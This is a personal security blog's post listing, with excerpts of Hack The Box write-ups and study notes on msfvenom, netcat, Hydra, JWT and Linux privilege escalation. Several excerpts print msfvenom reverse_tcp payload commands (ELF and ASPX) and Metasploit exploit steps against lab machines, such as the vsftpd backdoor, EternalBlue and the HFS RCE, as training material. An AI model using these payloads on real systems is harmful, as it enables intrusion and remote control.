自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(255)
  • 收藏
  • 关注

原创 john爆破出现Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])

Using default input encoding: UTF-8Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])No password hashes left to crack (see FAQ)

2022-06-30 10:08:05 5277 2

原创 msfvenom学习笔记

来源于啊B的这个视频的学习笔记,但是讲的很乱msfvenom是msfpayload和msfencode的组合,将这两个工具集成在一个框架实例中,就是msfvenom。msfvenom是用来生成后门的软件,在目标机器上执行后门后,在本地监听就能上线shell。msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f elf > shell.elfmsfvenom -p windows/meterprete

2022-06-26 16:10:46 2259

原创 以escalate靶机为例学习linux的提权方式-linux提权学习笔记(1)

linux11种提权方式总结

2022-06-25 10:46:15 2859 1

原创 hack the box-challenges:Ransom题解

打开题目,看下描述,大概能知道的意思是公司收到了一个自称是来自微软官方的文件,文件名为windows_updata.exe,看起来非常像更新的补丁,因此进行了安装,结果文件都被加密了。下载下来给的文件,一共包含两个文件,分别是login.xlsx.enc以及windows_update.exe。看题目的描述,感觉这是不是被勒索加密了?前面的login.xlsx.enc就是原文件login.xlsx被加密了。因此我们需要知道这个exe文件做了啥。但是问题是,我不会逆向啊!所以我就去看别人怎么做的,找到

2022-06-20 16:48:44 665

原创 kali linux安装terminator以及简单使用

kali linux安装terminator以及简单使用

2022-06-05 13:37:27 1426 2

原创 Hydra学习笔记

hydra学习笔记

2022-06-04 21:23:20 783

原创 hack the box:bart靶机

首先还是打开靶机,使用nmap直接扫描nmap -sV -Pn -A 10.10.10.81同时也用whatweb看下有没有合适的信息whatweb -v 10.10.10.81

2022-06-04 15:37:07 910

原创 hack the box-challenges:Persistence题解

首先还是打开题目,看下描述,描述的意思是:我们注意到来自无法更换的关键 PC 的一些奇怪连接。我们已运行 AV 扫描以删除恶意文件并重新启动机器,但连接会重新建立。我们已经备份了一些关键的系统文件,你能帮我们弄清楚发生了什么吗?当然可以,我来瞅瞅,先下载下来文件,看看是什么玩意。好家伙,有点麻烦,连后缀都没得,这哪知道是什么玩意。拖到kali中,用file命令查看下是什么文件。结果表明,这是一个注册表文件,okok。再通过搜索引擎找啊找,找到了这个软件,可以解析注册表文件。下载下来后,可以

2022-06-01 15:37:34 461

原创 hack the box-challenges:No Place To Hide题解

RDP日志文件分析

2022-05-31 20:47:03 310

原创 hack the box:redeemer靶机

好久没有打靶机了,手头的事忙完了,先从简单的开始。rededmer靶机,难度very easy,是新手村的靶机,redeemer的意思是救世主。看第一个问题:问:tcp开了什么端口答:6379,麻了,扫了一个小时没扫出来,最后看后面说redis,想起来以前做过,redis在6379端口。第二问:问:跑了什么服务?答:redis第三问:问:redis的数据库类型是什么?答:in-memory database第四问:问:使用什么工具去连接redis回答:redis-cli第

2022-05-23 21:22:43 1836

原创 hack the box-challenges:Lure题解

打开题目,看下题目的要求说了啥,翻译一下就是:财务团队收到了一封看起来很重要的电子邮件,其中包含附加的 Word 文档。你能看一下并确认它是否是恶意的吗?下载下来文件,一打开,确实是word文档。木马,不存在的,我tm直接打开,我就不信了。好吧,打开确实是word,但是看不到其他内容了。此时我想到,要不用binwalk看下?binwalk UegentPayment.doc也看不出什么东西,那么咱们直接找别人的教程吧(逃……)在kali中用libreoffice打开,提示包含macro

2022-05-14 21:53:06 470 1

原创 hack the box:silo靶机

比较好奇每个靶机的英文名字是啥意思,silo有核武器发射井以及地下贮藏室的意思。好,废话不多说,先打开靶机,注意一下提示:进行扫描一下nmap -sV -Pn -A 10.10.10.82扫描结果显示,存在挺多的端口,80端口打开就是一个iis的页面,没什么东西,在msf中也没找到有用的东西。其中的1521和49159端口值得注意,在msf中使用oracle tns搜索,能找到一个漏洞tnsPosion_checker。选中后运行,发现目标主机存在漏洞,好了,突破口找到了。突破口是找到

2022-05-11 23:01:53 683 2

原创 hack the box:postman靶机

还是正常打开靶机,然后使用nmap扫描。看看有什么端口是打开的。扫描结果显示,开启了22,80,6379,10000端口。其中6379端口和10000端口值得注意。nmap -sV -Pn 10.10.10.160(这有个非常奇怪的地方,我第一次做的时候namp以及masscan无论如何都扫描不出6379端口,但是直接访问又是可以,感觉很郁闷,直接在第一步卡住了。菜……)我们分别打开80,10000端口看看。其中80端口就是一个简单的页面。10000端口打开,是webmin,注意这个地方要采用

2022-05-08 21:22:37 1554 1

原创 hack the box-challenges:logger题解

题目给了一段usb的流量,让解析一下,找到答案。先下载下来,发现是一段pcap包。直接双击,在wireshark中打开。通览一下,发现是USB传输的相关信息,一通百度谷歌后,发现其中的HID data比较重要这个HID data对应着传输的字符,具体的可以参考以下链接:https://wenku.baidu.com/view/9050c3c3af45b307e971971e.html有了这个,那就好办很多了,我们通过检索,能发现应该是source为1.16.1的主机给destination

2022-05-06 23:01:43 603

原创 hack the box-challenges:Insider题解

题目说:已报告潜在的内部威胁,我们需要找出他们访问的内容。你能帮我吗?点击download Files后,下载了一个文件,解压后,打开,如下图:mozilla,难道是浏览器?继续打开,可以确定这应该是浏览器的文件夹了。extensions应该是插件,firefox是火狐,所以这肯定是浏览器的文件夹。我们可以拿自己的电脑的文件夹比较下,还是比较像的。进去搜寻,大部分文件夹都是空的,或者没有意义的,直到我们搜索到firefox下面的profile文件夹打开第一个文件夹,其中有几个文件值得警

2022-05-05 22:56:23 1104

原创 解决hack the box国内访问慢的问题

今晚打开靶机使用nmap扫描,实在太慢了,而且靶机的ping一直高居不下,以前可能会选择切换节点试试,但是一般切了后,还是会出现这种情况,主要是国内的网络环境有点“复杂”。接着然后注意:hack the box官网有相应的建议,但是我切换了,不好使,建议如下:...

2022-05-02 23:14:21 5189 9

原创 linux下重要的目录及文件

在打linux靶机时,经常会遇到读取一个系统文件,但是很多时候我不知道为什么要读取这个文件,因此整理这个文档,将重要的目录以及文件进行整理。同时整个截图,以kali系统演示。/bin目录bin目录,binary(二进制的),里面存在很多可以执行的命令。/sbin目录sbin目录,super binary,存在着很多root用户可以执行的命令。普通用户一般是$符号开头root用户一般是#符号开头/usr目录usr目录,unxi system resource,看也有地方说是unix sof

2022-05-02 17:06:05 2066

原创 hack the box:Traverxec靶机

首先打开靶机,能看到一些提示先进行扫描看看nmap -sV -Pn -A 10.10.10.165通过扫描结果,能看出来开了80端口,还开了22端口。我们访问下80端口,能发现是一个网站,什么davide什么的。信息不够,我们使用whatweb看下网站的具体信息whatweb -v 10.10.10.165有个比较明显的蓝色的标志,nostromo,其实nmap扫描也有,我们进msf搜下,看有没有什么可以利用的。真的有可利用的,启动,利用起来search nostromouse

2022-05-01 22:59:29 1320

原创 hack the box-challenges:Export题解

打开题目,能看到关于题目的一段描述,大概内容为:我们发现了与我们其中一台服务器的可疑连接,并立即进行了内存转储。你能弄清楚攻击者在做什么吗?下载提供的files,文件为raw格式。应该是内存相关的信息镜像存储下来了。通过搜索,可以用Volatility在kali中读取。安装可以按照这个下面这个教程。教程中提供了好几个方法安装,我测试了第一个方法可行,那个直接放在/usr/sbin目录下面,我测试了后不行。https://www.cn不logs.com/yunqian2017/p/14769955.

2022-04-30 19:42:22 575

原创 hack the box-challenges:Event Horizon题解

打开题目,有一段描述,大概内容为:我们 CEO 的计算机在一次网络钓鱼攻击中遭到破坏。攻击者小心地清除了 PowerShell 日志,所以我们不知道他们执行了什么。你能帮助我们吗?下载下来文件,使用hack the box解压后,能发现全是windows日志文件。一共323个文件,这把完犊子了,不会要一个一个看吧。evtx文件是日志文件格式,可以使用windows自带的事件查看器查看。打开后,选择右边的打开日志文件,就会加载进来。记得命名改一下,防止与本地的重复。先从Application日

2022-04-29 20:31:53 489

原创 hack the box-challenges:chase题解

Intro to blueteam的第一题,打开后能看到题目的描述:题目描述的意思是,我们的一个 Web 服务器触发了 AV 警报,但没有一个系统管理员说他们已登录。在关闭服务器以克隆磁盘之前,我们已经进行了网络捕获。你能看看PCAP,看看有什么问题吗?点击左上方的下载,下载下来一个pcap文件。从上到下通览一遍,能够发现以下几个特殊的地方。我们大概能猜出来攻击者做了什么,上传了一个webshell,然后通过nc做了一个反向的shell,通过4444端口进行了连接。4444的反向she

2022-04-27 20:42:15 1325

原创 hack the box LaCasaDePapel靶机

打开靶机,扫描一下,能发现开了21,80,443等端口。nmap -sV -Pn -A 10.10.10.13180端口访问,是给了一个验证码,拿着验证码扫描出来的东西去解密也失败了,不对。443端口访问,发现是自签名证书,然后说要证书才能进,咱们也没有啊,先放放。ftp能发现是vsftpd 2.3.4版本,在msf搜索中发现存在后门,利用msf直接攻击发现无效,非常尴尬,通过以下方法可以搞定。首先是登录ftp,然后用户名输入任意带有:)符号的名字即可,密码随便输ftp 10.10.10

2022-04-26 18:20:47 465

原创 hack the box devel靶机

打开靶机,开扫,能看出来开了ftp和80端口,而且ftp能匿名访问。nmap -sV -Pn -A 10.10.10.5访问地址能发现就是IIS的界面,本来想着下面也许会有东西,但是爆破后没东西。登录一下ftp,发现进了网站的目录,测试上传的东西后,确实是网站的目录,那么就可以上传木马了。生成asp木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f aspx -o shell.aspx在

2022-04-23 20:53:51 2422

原创 hack the box optimum靶机

首先打开靶场,直接nmap开扫。nmap -sV -Pn -A 10.10.10.8通过扫描结果知道开启了80端口,80端口跑了HFS服务。顺势去msf搜索一下HFS有哪些漏洞search hfs使用下面的hfs的命令执行,然后看下要配置哪些东西use 1options需要配置好远程主机,本地主机,配置好,run。多run几次,前面几次容易失败,而且要等挺久的。set RHOSTS 10.10.10.8set LHOSTS 10.10.14.17run利用成功后,返回me

2022-04-21 21:29:20 2160

原创 hack the box-challenges:under construction题解

写在前面:第一次挑战中等难度的靶机,上来就遇到了代码审计以及jwt,两个都不懂,于是前几天补了jwt相关的内容,见这个链接:https://blog.csdn.net/zr1213159840/article/details/124283799今天来以这个靶场过一遍jwt,文章的总体解题思路参考了以下大佬的内容:https://www.cnblogs.com/snowie/p/14689894.html首先是打开靶场,给了一个链接,然后还能下载一些文件,文件有助于解题。文件下载下来后看是源码。

2022-04-20 21:43:57 1473

原创 JWT安全学习笔记

JWT安全学习笔记什么是JWT?JWT全称Json Web Token是一种跨域验证身份的方案,JWT不加密传输的数据,但是能够通过数字签名来验证数据未被篡改。JWT的组成JWT分为三部分,头部(Header),声明(claims),签名(signature),三个部分以英文句号.隔开。JWT的内容以Base64URL进行了编码。头部和声明是由base64url加密的。签名是整合头部和声明利用密钥进行加密的结果。(在HTTP传输过程中,Base64编码中的"=“,”+“,”/"等特殊URL编码

2022-04-19 21:27:51 1657

原创 hack the box blue靶机

靶机名字叫blue,提示的漏洞编号是cve-2017-0144。这是永恒之蓝漏洞(EternalBlue)。扫描一下,能发现打开了445等端口。有很多smb的信息。nmap -sV -Pn -A 10.10.10.40既然都知道是永恒之蓝了,直接利用吧,启动msf,然后搜索一下blue相关的。search blue第14个是RCE,我们选择use 14使用options看下需要配置哪些东西需要配置远程主机,远程端口(已默认),本地主机。配置完成后直接RUNset RHOSTS

2022-04-15 19:55:16 1277

原创 hack the box netmon靶机

本来看着这个靶机,觉得应该不难吧,结果还是看了不少东西才学会。按照惯例,先开扫nmap -sV -Pn -A 10.10.10.152这个地方有几个有用的信息,第一个,ftp匿名,第二个,80端口跑了服务。打开后,能看到以下页面,同时注意这个服务的名字,后面要找和这个名字相关的配置文件等等:通过扫描的结果能知道ftp端口是能够匿名登录的,那我就不客气了,直接登录。注意注意,这个匿名登录也是要输入账户名的,账户名anonymous。(这个地方多说几句,我才开始匿名不输入,直接回车,我还想为啥登录不

2022-04-14 21:40:50 1297

原创 hack the box jerry靶机

打开靶机,扫一下看看有什么东西。能看到是存在一个8080端口,tomcat,apache等信息nmap -sV -Pn -A 10.10.10.95这个机器给了提示,说什么远程命令执行,什么文件上传之类的。我感觉使用msf或许可以。于是打开msf进去搜索了一下。能看到确实有上传相关的漏洞。search apache tomcat这下好了,直接利用就好了,哈哈哈哈。首先配置远程主机为10.10.10.95,配置远程端口为8080,然后直接run!不出意外直接没用,非常尴尬。接着看了一下漏

2022-04-14 20:12:05 928

原创 hack the box lame靶机

首先打开靶机,给了提示,说是cve-2007-2447,搜索这个漏洞编号后,发现是一个samba漏洞,名字叫usermap_script使用nmap扫描一下看看,能发现确实是存在samba的。nmap -sV -Pn -A 10.10.10.3打开msf,然后搜索usermap_scriptsearch usermap_script然后使用第一个exploituse 0查看一下需要设置哪些东西options将远程地址设置为10.10.10.3,远程的端口设置为445(才开

2022-04-13 20:43:02 570

原创 hack the box靶场responder靶机

打开靶机,看第一个问题:问:机器上跑了几个tcp端口?回答:3个,才开始使用默认扫描方式只扫出来一个80,后来指定了端口返回,扫出来三个端口,分别是80、5985、7680,使用如下命令扫描nmap -v -A -p1-65535 10.129.212.141第二个问题:问:当使用IP进行访问时,被重定向去了哪里?回答:unika.htb第三个问题:问:网页是使用哪种脚本语言写的?回答:php。首先在burpsuite中进行抓包,然后对回包进行截取然后能看到网页是用php

2022-04-12 22:29:27 3539

原创 hack the box靶场unified靶机

打开,看第一题问:打开了哪些端口?回答:22,6789,8080,8443直接用下面命令开扫nmap -sV -Pn 10.129.58.25 第二问:问:最大端口号的应用叫啥名?回答:UniFI network。直接带端口访问即可,记得使用https://第三个问题:问:跑的软件啥版本?回答:根据上面的图,能知道是6.4.54第四个问题:问:漏洞的编号是什么?回答:cve-2021-44228。问的我是一头雾水,最后在百度上搜这个靶场的问题,然后顺着找到了这篇文章:

2022-03-26 20:55:00 4899

原创 hack the box靶场Vaccine靶机

开启,看第一题:问:除了跑了ssh和http服务,还有什么服务?回答:ftp,使用nmap扫描,能看到结果nmap -sV -Pn 10.129.95.174 第二个问题:问:有一个服务时可以匿名登录的,用户名是什么?回答:anonymous。下意识猜测是ftp服务可以匿名登录,直接在文件管理中使用ftp登录,看到以下结果,然后可以登录,确信是anonymous并且其中包含一个backup.zip文件,直接下载下来,肯定和后面的题目相关。说曹操曹操到,第三问问:可以下载的文件

2022-03-23 21:27:08 3188

原创 netcat(NC)学习笔记-nc命令基础解释以及基础使用--包含使用nc获取shell

NC学习笔记搭配这个视频链接使用更佳https://space.bilibili.com/439906928/channel/seriesdetail?sid=231485基础概念nc是什么?nc全称netcat,是借助tcp/ip连接来传送数据的一个工具,有tcp/ip连接的瑞士军刀美称。nc有哪些功能nc的主要功能有获取banner信息,远程控制,传输文件,端口扫描等功能,甚至能当聊天工具nc的基本用法connect to somewhere:连接至某个主机–nc的客户端nc [

2022-03-22 21:22:30 4844

原创 kali中搭建简单http服务的四种方法(其中几种在其他linux中也适用)

在kail中搭建一个简单的http服务第一种方法,使用python搭建简易的http服务器python3 -m http.server 80运行在哪个目录,网站的根目录就在哪。第二种方法,使用php搭建php -S 0.0.0.0:8080网站的根目录还是一样的,可以使用-t指定目录。第三种使用ruby搭建ruby -run -e httpd . -p 9000第四种是使用busyboxbusybox将具有很多小功能的工具结合到单一的可执行文件busybox httpd -f -

2022-03-22 21:15:20 8340

原创 hack the box靶场oopsie靶机

打开靶机,看一下第一个问题:问:什么可以拦截本地的流量?答案:看着y结尾,应该是proxy,输入正确第二问:问:登录界面在什么文件夹下面?答案:/cdn-cgi/login。知道这个页面的最直接的方式是f12后看下页面,能看到有一个cdn-cgi/login相关的信息。同时,根据提示,可以使用burpsuite爬取,这也是更加合适的方式,因为爬取能提供我们下一步信息。在burpsuite中爬取这个网站,操作就是拦截数据包后在target中右击网站选择spider this host即可。然

2022-03-21 20:17:30 1502

原创 hack the box靶场archetype靶机

照常打开靶机,看第一个问题问:主机上的数据库服务时TCP的哪个端口?答案:1433.可以通过以下命令扫描得出结果nmap -sV -Pn 10.129.239.163第二个问题:问:非管理员的共享的文件夹是什么?答案:backups。这题是看了提示才知道,提示说可以使用-N -L查看文件夹就能知道了。使用以下命令查看smbclient -N -L 10.129.239.163其中以$结尾的文件夹,都是需要管理员权限的。第三个问题:问:smb共享文件夹中的文件上,可能的密码是

2022-03-19 22:09:49 897

原创 hack the box靶场crocodile靶机

照常打开,看第一个问题:问:在nmap中使用默认脚本扫描的是什么命令?答案:-sC。可以使用nmap -h查看一下各个指令的含义看第二个问题问:21端口上跑的服务的版本是什么?答案:vsftpd 3.0.3。可以通过以下指令扫描出服务的版本nmap -sV -Pn -p21 10.129.218.218第三个问题问:允许ftp匿名登录的代码是什么?答案:230。根据上面的提醒,说使用默认的脚本扫描时-sC,那么我们可以使用以下的命令测试一下21端口就知道了。nmap -

2022-03-18 18:22:09 1275

原创 hackthe box靶场sequel靶机

第一个问题:SQL的全称是什么?答案:Structured Query Language,结构化查询语言第二个问题:扫描时,mysql跑在哪个端口回答:3306,通过扫描能看出结果。同时也能获取到第三个问题的答案。第三个问题:目标主机上跑的mysql是什么版本?答案:mariadb。其实题目最顶栏的tags上面就说了是mariadb。扫描的方式如下:nmap -A -T4 10.129.40.126结果如下:第四个问题:我们需要使用什么开关来指定 MySQL 服务的登录用户名?.

2022-03-18 09:49:44 1346

原创 hack the box靶场appointment靶机

还是和以前一样打开靶机第一个问题:SQL全称是什么?答案:Structured Query Language。中文名字叫结构化查询语言第二个问题:最常见的SQL漏洞类型是什么?答案:SQL injection,很明显是SQL注入第三个问题:PII代表什么意思?答案:personally identifiable information,通过百度来的,个人身份信息或者个人验证信息第四个问题:OWASP 前 10 名列表将此漏洞的分类命名为什么?答案:A03:2021-Injection

2022-03-17 15:41:42 1713 3

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除